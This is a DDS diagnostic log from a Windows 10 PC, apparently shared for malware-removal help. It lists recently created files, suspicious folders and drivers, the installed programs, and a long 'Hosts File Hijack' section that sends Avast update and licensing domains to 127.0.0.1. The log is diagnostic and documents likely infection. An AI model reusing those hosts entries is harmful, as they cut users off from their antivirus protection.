2018-05-24 08:37:39 -------- d-----w- C:\Windows\ServiceProfiles
2018-05-24 08:25:33 7242240 ----a-w- C:\Windows\SysWow64\NL7Data0011.dll
2018-05-24 08:25:33 516096 ----a-w- C:\Windows\SysWow64\MSWB70011.dll
2018-05-24 08:25:32 7702016 ----a-w- C:\Windows\System32\NL7Models0011.dll
2018-05-24 08:25:32 7406080 ----a-w- C:\Windows\System32\NL7Data0011.dll
2018-05-24 08:25:32 712704 ----a-w- C:\Windows\System32\MSWB70011.dll
2018-05-24 08:25:32 2454528 ----a-w- C:\Windows\System32\NL7Lexicons0011.dll
2018-05-24 08:24:54 778936 ----a-w- C:\Windows\SysWow64\PresentationNative_v0300.dll
2018-05-24 08:24:54 35456 ----a-w- C:\Windows\SysWow64\TsWpfWrp.exe
2018-05-24 08:24:54 103120 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2018-05-24 08:24:53 124624 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2018-05-24 08:24:53 1166520 ----a-w- C:\Windows\System32\PresentationNative_v0300.dll
2018-05-24 08:24:52 35456 ----a-w- C:\Windows\System32\TsWpfWrp.exe
2018-05-24 08:23:26 82432 ----a-w- C:\Windows\SysWow64\XPSSHHDR.dll
2018-05-24 08:23:26 575488 ----a-w- C:\Windows\SysWow64\XpsFilt.dll
2018-05-24 08:23:26 3398144 ----a-w- C:\Windows\SysWow64\xpsrchvw.exe
2018-05-24 08:23:26 100352 ----a-w- C:\Windows\System32\XPSSHHDR.dll
2018-05-24 08:23:25 925696 ----a-w- C:\Windows\System32\XpsFilt.dll
2018-05-24 08:23:25 4492288 ----a-w- C:\Windows\System32\xpsrchvw.exe
2018-05-24 08:22:56 3331584 ----a-w- C:\Windows\SysWow64\NlsLexicons0018.dll
2018-05-24 08:22:56 3331584 ----a-w- C:\Windows\System32\NlsLexicons0018.dll
2018-05-24 08:22:56 1914880 ----a-w- C:\Windows\System32\MLS2.dll
2018-05-24 08:22:56 1866752 ----a-w- C:\Windows\SysWow64\MLS2.dll
2018-05-24 08:22:56 166912 ----a-w- C:\Windows\System32\NlsData0018.dll
2018-05-24 08:22:56 131584 ----a-w- C:\Windows\SysWow64\NlsData0018.dll
2018-05-24 06:01:52 -------- d-----w- C:\Users\Craciun\AppData\Roaming\EpicNet Inc
2018-05-24 06:01:11 -------- d-----w- C:\ProgramData\SystemaRev
2018-05-24 06:00:09 36096 ----a-w- C:\Windows\System32\drivers\WinmonProcessMonitor.sys
2018-05-24 05:56:53 9159064 ----a-w- C:\Windows\System32\ntkrnlmp.exe
2018-05-24 05:56:53 1258280 ----a-w- C:\Windows\System32\osloader.exe
2018-05-24 05:48:35 -------- d-----w- C:\Users\Craciun\AppData\Roaming\SystemHealer
2018-05-24 05:44:46 2990080 ----a-w- C:\Windows\System32\mcicda64.dll
2018-05-24 05:44:46 -------- d-----w- C:\Program Files\My Program
2018-05-24 05:41:12 -------- d-----w- C:\Users\Craciun\AppData\Roaming\FastDataX
2018-05-24 05:39:27 -------- d-----w- C:\Program Files (x86)\Multitimer
2018-05-24 05:39:00 -------- d-----w- C:\Program Files (x86)\ShutdownTime
2018-05-24 05:36:45 -------- d-----w- C:\ProgramData\yahoochrome_D
2018-05-24 05:36:42 -------- d-----w- C:\Program Files (x86)\trs
2018-05-24 05:36:18 -------- d-----w- C:\Program Files (x86)\foldershare
2018-05-24 05:34:02 -------- d-----w- C:\Users\Craciun\AppData\Roaming\WidModule
2018-05-24 05:33:49 -------- d-----w- C:\Users\Craciun\AppData\Roaming\dwirn
2018-05-24 05:33:41 -------- d-----w- C:\Users\Craciun\AppData\Local\XService
2018-05-24 05:32:55 -------- d-----w- C:\Program Files (x86)\Microsoft Toolkit Final
2018-05-24 02:07:29 14600328 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{1C5DBCAB-D9C6-4752-A341-EAED5A28305D}\mpengine.dll
2018-05-24 01:59:46 -------- d-----w- C:\ProgramData\Microsoft OneDrive
2018-05-23 22:17:52 -------- d-sh--w- C:\Recovery
2018-05-23 22:17:51 -------- d-sh--we C:\ProgramData\Documents
2018-05-23 22:05:09 -------- d-----w- C:\Windows\System32\wbem\Performance
2018-05-23 22:01:09 -------- d-----w- C:\Windows\System32\wbem\MOF\good
2018-05-23 22:01:08 -------- d-----w- C:\Windows\System32\wbem\MOF\bad
2018-05-23 21:51:09 -------- d-----w- C:\ProgramData\USOShared
2018-05-23 21:50:59 2752000 ----a-w- C:\Windows\SysWow64\PrintConfig.dll
2018-05-23 21:48:47 -------- d-----w- C:\Windows\System32\wbem\MOF
2018-05-23 21:46:53 -------- d-----w- C:\Windows\System32\SleepStudy
2018-05-23 18:26:50 14575456 ------w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2018-05-21 08:01:23 -------- dc----w- C:\Windows\Panther
.
==================== Find3M  ====================
.
2018-05-09 22:29:48 141696960 -c--a-w- C:\Windows\System32\MRT-KB890830.exe
2018-05-01 21:22:36 835064 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2018-05-01 21:22:36 179704 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2018-04-26 06:44:00 61472 ----a-w- C:\Windows\System32\drivers\wd\WdNisDrv.sys
2018-04-26 06:43:59 46072 ----a-w- C:\Windows\System32\drivers\wd\WdBoot.sys
2018-04-26 06:43:59 313888 ----a-w- C:\Windows\System32\drivers\wd\WdFilter.sys
2018-04-12 09:15:20 4096 ----a-w- C:\Windows\SysWow64\wbem\en\Microsoft.AppV.AppVClientWmi.resources.dll
2018-04-12 09:15:20 4096 ----a-w- C:\Windows\System32\wbem\en\Microsoft.AppV.AppVClientWmi.resources.dll
2018-04-12 09:15:07 6656 ----a-w- C:\Windows\SysWow64\drivers\en-US\ndiscap.sys.mui
2018-04-12 09:15:04 11776 ----a-w- C:\Windows\SysWow64\drivers\en-US\NdisImPlatform.sys.mui
2018-04-12 09:15:01 3584 ----a-w- C:\Windows\SysWow64\drivers\en-US\wfplwfs.sys.mui
2018-04-11 23:36:40 208384 ----a-w- C:\Windows\SysWow64\msclmd.dll
2018-04-11 23:36:39 229376 ----a-w- C:\Windows\System32\msclmd.dll
2018-04-11 23:34:59 96256 ----a-w- C:\Windows\SysWow64\IdCtrls.dll
2018-04-11 23:33:58 956416 ----a-w- C:\Windows\System32\WebcamUi.dll
2018-04-11 21:04:40 118272 ----a-w- C:\Windows\SysWow64\poqexec.exe
2018-04-11 21:04:39 141312 ----a-w- C:\Windows\System32\poqexec.exe
2018-04-11 21:04:35 846744 ----a-w- C:\Windows\System32\SmiEngine.dll
2018-04-11 21:04:35 795032 ----a-w- C:\Windows\System32\NetSetupEngine.dll
2018-04-11 21:04:35 207872 ----a-w- C:\Windows\System32\PkgMgr.exe
2018-04-11 21:04:35 141728 ----a-w- C:\Windows\System32\NetSetupApi.dll
2018-04-11 21:04:35 131488 ----a-w- C:\Windows\System32\SSShim.dll
2018-04-11 21:04:35 110592 ----a-w- C:\Windows\System32\NetDriverInstall.dll
2018-04-11 21:04:34 244640 ----a-w- C:\Windows\System32\wdscore.dll
2018-04-11 07:08:00 387928 ----a-w- C:\Windows\System32\wmpps.dll
2018-04-11 07:02:00 277424 ----a-w- C:\Windows\System32\wmpeffects.dll
2018-04-11 06:44:00 571392 ----a-w- C:\Windows\System32\quickassist.exe
2018-04-11 06:39:00 9137664 ----a-w- C:\Windows\System32\wmploc.DLL
2018-04-11 06:39:00 906240 ----a-w- C:\Windows\System32\sqlceqp40.dll
2018-04-11 06:39:00 7168 ----a-w- C:\Windows\System32\msdxm.ocx
2018-04-11 06:39:00 7168 ----a-w- C:\Windows\System32\dxmasf.dll
2018-04-11 06:39:00 517632 ----a-w- C:\Windows\System32\sqlcese40.dll
2018-04-11 06:39:00 2560 ----a-w- C:\Windows\System32\wmerror.dll
2018-04-11 06:39:00 254976 ----a-w- C:\Windows\System32\unregmp2.exe
2018-04-11 06:39:00 215552 ----a-w- C:\Windows\System32\wmpdxm.dll
2018-04-11 06:39:00 202240 ----a-w- C:\Windows\System32\sqlceoledb40.dll
2018-04-11 06:39:00 137728 ----a-w- C:\Windows\System32\sqlcecompact40.dll
2018-04-11 06:39:00 126464 ----a-w- C:\Windows\System32\wmpshell.dll
2018-04-11 06:39:00 11264 ----a-w- C:\Windows\System32\spwmp.dll
2018-04-11 06:00:00 44032 ----a-w- C:\Windows\System32\msdxm.tlb
2018-04-11 06:00:00 18944 ----a-w- C:\Windows\System32\amcompat.tlb
2018-04-11 05:20:00 251096 ----a-w- C:\Windows\SysWow64\wmpeffects.dll
2018-04-11 05:20:00 153976 ----a-w- C:\Windows\SysWow64\wmpps.dll
2018-04-11 05:12:00 458240 ----a-w- C:\Windows\SysWow64\quickassist.exe
2018-04-11 05:08:00 9137664 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2018-04-11 05:08:00 730624 ----a-w- C:\Windows\SysWow64\sqlceqp40.dll
2018-04-11 05:08:00 427520 ----a-w- C:\Windows\SysWow64\sqlcese40.dll
2018-04-11 05:08:00 2560 ----a-w- C:\Windows\SysWow64\wmerror.dll
2018-04-11 05:08:00 215040 ----a-w- C:\Windows\SysWow64\unregmp2.exe
2018-04-11 05:08:00 172544 ----a-w- C:\Windows\SysWow64\wmpdxm.dll
2018-04-11 05:08:00 101888 ----a-w- C:\Windows\SysWow64\wmpshell.dll
2018-04-11 05:07:00 9216 ----a-w- C:\Windows\SysWow64\spwmp.dll
2018-04-11 05:07:00 5632 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2018-04-11 05:07:00 5632 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2018-04-11 05:07:00 173568 ----a-w- C:\Windows\SysWow64\sqlceoledb40.dll
2018-04-11 05:07:00 117760 ----a-w- C:\Windows\SysWow64\sqlcecompact40.dll
2018-04-11 04:31:00 44032 ----a-w- C:\Windows\SysWow64\msdxm.tlb
2018-04-11 04:31:00 18944 ----a-w- C:\Windows\SysWow64\amcompat.tlb
2018-04-10 21:11:00 48640 ----a-w- C:\Windows\SysWow64\SyncProxy.dll
2018-04-10 21:11:00 48640 ----a-w- C:\Windows\SysWow64\APHostClient.dll
2018-04-10 21:11:00 2629120 ----a-w- C:\Windows\SysWow64\NlsLexicons0009.dll
2018-04-10 21:10:00 5739008 ----a-w- C:\Windows\System32\prm0009.dll
2018-04-10 21:10:00 2560 ----a-w- C:\Windows\SysWow64\SyncRes.dll
2018-04-10 21:10:00 148480 ----a-w- C:\Windows\SysWow64\MCCSEngineShared.dll
2018-04-10 21:10:00 117760 ----a-w- C:\Windows\SysWow64\networkhelper.dll
2018-04-10 21:09:00 520704 ----a-w- C:\Windows\SysWow64\SyncController.dll
2018-04-10 21:09:00 2629120 ----a-w- C:\Windows\System32\NlsLexicons0009.dll
2018-04-10 21:09:00 214016 ----a-w- C:\Windows\SysWow64\accountaccessor.dll
2018-04-10 21:09:00 20480 ----a-w- C:\Windows\System32\MCCSPal.dll
2018-04-10 21:08:00 93184 ----a-w- C:\Windows\System32\InternetMailCsp.dll
2018-04-10 21:08:00 70656 ----a-w- C:\Windows\System32\APHostClient.dll
2018-04-10 21:08:00 61952 ----a-w- C:\Windows\System32\SyncProxy.dll
2018-04-10 21:08:00 57856 ----a-w- C:\Windows\System32\InprocLogger.dll
2018-04-10 21:08:00 327680 ----a-w- C:\Windows\SysWow64\syncutil.dll
2018-04-10 21:08:00 2560 ----a-w- C:\Windows\System32\SyncRes.dll
2018-04-10 21:08:00 16384 ----a-w- C:\Windows\System32\APHostRes.dll
2018-04-10 21:07:00 99328 ----a-w- C:\Windows\System32\ActiveSyncCsp.dll
2018-04-10 21:07:00 62976 ----a-w- C:\Windows\System32\EASPolicyManagerBrokerHost.exe
2018-04-10 21:07:00 361984 ----a-w- C:\Windows\SysWow64\AccountsRt.dll
2018-04-10 21:07:00 346112 ----a-w- C:\Windows\SysWow64\DavSyncProvider.dll
2018-04-10 21:07:00 176128 ----a-w- C:\Windows\System32\MCCSEngineShared.dll
2018-04-10 21:07:00 13824 ----a-w- C:\Windows\System32\EasPolicyManagerBrokerPS.dll
2018-04-10 21:06:00 731648 ----a-w- C:\Windows\System32\internetmail.dll
2018-04-10 21:06:00 5487616 ----a-w- C:\Windows\SysWow64\NlsData0009.dll
2018-04-10 21:06:00 391168 ----a-w- C:\Windows\System32\syncutil.dll
2018-04-10 21:06:00 267776 ----a-w- C:\Windows\System32\accountaccessor.dll
2018-04-10 21:06:00 1537024 ----a-w- C:\Windows\SysWow64\ActiveSyncProvider.dll
2018-04-10 21:06:00 137728 ----a-w- C:\Windows\System32\networkhelper.dll
2018-04-10 21:05:00 619520 ----a-w- C:\Windows\System32\SyncController.dll
2018-04-10 21:05:00 403456 ----a-w- C:\Windows\System32\DavSyncProvider.dll
2018-04-10 21:05:00 324608 ----a-w- C:\Windows\System32\APHostService.dll
2018-04-10 21:04:00 434176 ----a-w- C:\Windows\System32\AccountsRt.dll
2018-04-10 21:02:00 6350848 ----a-w- C:\Windows\System32\NlsData0009.dll
2018-04-10 21:02:00 1773056 ----a-w- C:\Windows\System32\ActiveSyncProvider.dll
2018-03-28 17:03:44 126856 ----a-w- C:\Windows\System32\drivers\gtkrnl.sys
2017-11-15 15:06:59 7649280 ----a-w- C:\Program Files (x86)\GUTA61F.tmp
.
============= FINISH: 22:08:31.91 ===============

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 10 Pro
Boot Device: \Device\HarddiskVolume1
Install Date: 5/24/2018 1:18:45 AM
System Uptime: 6/8/2018 10:44:08 AM (12 hours ago)
.
Motherboard: Type2 - Board Vendor Name1 |  | Type2 - Board Product Name1
Processor: Intel® Pentium® CPU B960 @ 2.20GHz | U3E1 | 2200/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 97 GiB total, 41.542 GiB free.
D: is FIXED (NTFS) - 200 GiB total, 104.307 GiB free.
F: is CDROM ()
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
No restore point in system.
.
==== Hosts File Hijack ======================
.
Hosts: 127.0.0.1 gf.tools.avast.com
Hosts: 127.0.0.1 pair.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
Hosts: 127.0.0.1 ipm-provider.ff.avast.com
Hosts: 127.0.0.1 id.avast.com
Hosts: 127.0.0.1 s5355946.iavs9x.u.avast.com
Hosts: 127.0.0.1 s5355946.ivps9x.u.avast.com
Hosts: 127.0.0.1 s5355946.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 s5355946.vpsnitro.u.avast.com
Hosts: 127.0.0.1 s5355946.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 s5355946.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 l2932126.iavs9x.u.avast.com
Hosts: 127.0.0.1 l2932126.ivps9x.u.avast.com
Hosts: 127.0.0.1 l2932126.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 l2932126.vpsnitro.u.avast.com
Hosts: 127.0.0.1 l2932126.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 l2932126.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 b1652951.iavs9x.u.avast.com
Hosts: 127.0.0.1 b1652951.ivps9x.u.avast.com
Hosts: 127.0.0.1 b1652951.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 b1652951.vpsnitro.u.avast.com
Hosts: 127.0.0.1 b1652951.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 b1652951.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 d0566038.iavs9x.u.avast.com
Hosts: 127.0.0.1 d0566038.ivps9x.u.avast.com
Hosts: 127.0.0.1 d0566038.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 d0566038.vpsnitro.u.avast.com
Hosts: 127.0.0.1 d0566038.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 d0566038.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 l2591751.iavs9x.u.avast.com
Hosts: 127.0.0.1 l2591751.ivps9x.u.avast.com
Hosts: 127.0.0.1 l2591751.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 l2591751.vpsnitro.u.avast.com
Hosts: 127.0.0.1 l2591751.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 l2591751.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 n5702781.iavs9x.u.avast.com
Hosts: 127.0.0.1 n5702781.ivps9x.u.avast.com
Hosts: 127.0.0.1 n5702781.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 n5702781.vpsnitro.u.avast.com
Hosts: 127.0.0.1 n5702781.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 n5702781.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 v6197912.iavs9x.u.avast.com
Hosts: 127.0.0.1 v6197912.ivps9x.u.avast.com
Hosts: 127.0.0.1 v6197912.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 v6197912.vpsnitro.u.avast.com
Hosts: 127.0.0.1 v6197912.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 v6197912.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 n4464433.iavs9x.u.avast.com
Hosts: 127.0.0.1 n4464433.ivps9x.u.avast.com
Hosts: 127.0.0.1 n4464433.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 n4464433.vpsnitro.u.avast.com
Hosts: 127.0.0.1 n4464433.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 n4464433.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 r3015597.iavs9x.u.avast.com
Hosts: 127.0.0.1 r3015597.ivps9x.u.avast.com
Hosts: 127.0.0.1 r3015597.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 r3015597.vpsnitro.u.avast.com
Hosts: 127.0.0.1 r3015597.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 r3015597.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 s5732833.iavs9x.u.avast.com
Hosts: 127.0.0.1 s5732833.ivps9x.u.avast.com
Hosts: 127.0.0.1 s5732833.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 s5732833.vpsnitro.u.avast.com
Hosts: 127.0.0.1 s5732833.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 s5732833.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 w6813828.iavs9x.u.avast.com
Hosts: 127.0.0.1 w6813828.ivps9x.u.avast.com
Hosts: 127.0.0.1 w6813828.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 w6813828.vpsnitro.u.avast.com
Hosts: 127.0.0.1 w6813828.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 w6813828.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 f4135468.iavs9x.u.avast.com
Hosts: 127.0.0.1 f4135468.ivps9x.u.avast.com
Hosts: 127.0.0.1 f4135468.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 f4135468.vpsnitro.u.avast.com
Hosts: 127.0.0.1 f4135468.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 f4135468.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 n4944709.iavs9x.u.avast.com
Hosts: 127.0.0.1 n4944709.ivps9x.u.avast.com
Hosts: 127.0.0.1 n4944709.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 n4944709.vpsnitro.u.avast.com
Hosts: 127.0.0.1 n4944709.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 n4944709.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 h2076260.iavs9x.u.avast.com
Hosts: 127.0.0.1 h2076260.ivps9x.u.avast.com
Hosts: 127.0.0.1 h2076260.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 h2076260.vpsnitro.u.avast.com
Hosts: 127.0.0.1 h2076260.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 h2076260.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 z1686792.iavs9x.u.avast.com
Hosts: 127.0.0.1 z1686792.ivps9x.u.avast.com
Hosts: 127.0.0.1 z1686792.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 z1686792.vpsnitro.u.avast.com
Hosts: 127.0.0.1 z1686792.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 z1686792.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 j2123265.iavs9x.u.avast.com
Hosts: 127.0.0.1 j2123265.ivps9x.u.avast.com
Hosts: 127.0.0.1 j2123265.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 j2123265.vpsnitro.u.avast.com
Hosts: 127.0.0.1 j2123265.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 j2123265.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 v6959781.iavs9x.u.avast.com
Hosts: 127.0.0.1 v6959781.ivps9x.u.avast.com
Hosts: 127.0.0.1 v6959781.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 v6959781.vpsnitro.u.avast.com
Hosts: 127.0.0.1 v6959781.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 v6959781.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 r1513284.iavs9x.u.avast.com
Hosts: 127.0.0.1 r1513284.ivps9x.u.avast.com
Hosts: 127.0.0.1 r1513284.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 r1513284.vpsnitro.u.avast.com
Hosts: 127.0.0.1 r1513284.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 r1513284.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 g0431773.iavs9x.u.avast.com
Hosts: 127.0.0.1 g0431773.ivps9x.u.avast.com
Hosts: 127.0.0.1 g0431773.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 g0431773.vpsnitro.u.avast.com
Hosts: 127.0.0.1 g0431773.vpsnitrotiny.u.avast.com
Hosts: 127.0.0.1 g0431773.iavs5x.u.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7.stats.avast.com
Hosts: 127.0.0.1 v7event.stats.avast.com
Hosts: 127.0.0.1 sm00.avast.com
Hosts: 127.0.0.1 submit5.avast.com
Hosts: 127.0.0.1 geoip.avast.com
Hosts: 127.0.0.1 b5631766.iavs9x.u.avast.com
Hosts: 127.0.0.1 b5631766.ivps9x.u.avast.com
Hosts: 127.0.0.1 b5631766.ivps9tiny.u.avast.com
Hosts: 127.0.0.1 b5631766.vpsnitro.u.avast.com
Hosts: 127.0.0.1 b5631766.vpsnitrotiny.u.avast.com
.
==== Installed Programs ======================
.
µTorrent
Adobe Creative Cloud
Adobe Photoshop CC 2017
AP Tuner 3.08
BS.Player FREE
CloudNet
Counter Strike 1.6 Warzone
DAEMON Tools Pro
Google Chrome
Google Update Helper
Intel® C++ Redistributables on Intel® 64
Java 8 Update 161
Lightshot-5.4.0.35
Malwarebytes version 3.5.1.2522
Microsoft OneDrive
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660
